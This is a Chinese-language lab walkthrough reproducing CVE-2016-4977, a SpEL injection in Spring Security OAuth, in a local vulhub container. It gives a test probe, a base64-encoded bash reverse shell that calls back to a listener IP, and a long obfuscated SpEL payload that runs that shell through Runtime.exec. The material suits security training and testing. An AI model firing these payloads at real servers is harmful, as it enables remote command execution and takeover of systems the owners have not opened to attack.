漏洞描述
Spring Security OAuth 是为了Spring 框架提供安全认证支持的一个模块。在其使用 white label views 来处理错误时,由于使用了Springs Expression Language(SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令
影响范围
2.0.0-2.0.9
1.0.0-1.0.5
环境搭建
-
进入靶场
-
cd vulhub/spring/CVE-2016-4977
-
开启靶场
-
docker-compose up -d
-
查看靶场信息
-
docker ps
-
访问网址
-
http://youip:8080
复现过程
访问路径 /oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是SpringBoot
然后会让我们登入,默认账号密码admin:admin
poc验证是否存在漏洞
- /oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
可以看到存在漏洞,接着反弹shell回来
反弹shell
先将反弹shell命令进行bash64编码
- bash -i >& /dev/tcp/192.168.198.129/6666 0>&1
- CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xOTguMTI5LzY2NjYgMD4mMQ==
然后放入以下格式
bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xOTguMTI5LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
kali监听6666端口
- nu -lvvp 6666
构造反弹shellPOChttp://your-ip:8080/oauth/authorize?response_type=上面的那一长串POC&client_id=acme&scope=openid&redirect_uri=http://test
http://192.168.198.129:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(87)).concat(T(java.lang.Character).toString(107)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(80)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(57)).concat(T(java.lang.Character).toString(48)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(107)).concat(T(java.lang.Character).toString(121)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(53)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(81)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}&client_id=acme&scope=openid&redirect_uri=http://test
然后访问链接就可以看到监听端口回显
关闭镜像
docker-compose down